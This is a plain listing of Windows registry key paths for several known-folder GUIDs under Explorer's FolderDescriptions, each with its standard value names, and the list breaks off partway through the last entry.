HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE974D24-D9C6-4D3E-BF91-F4455120B917}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\PublishExpandedPath
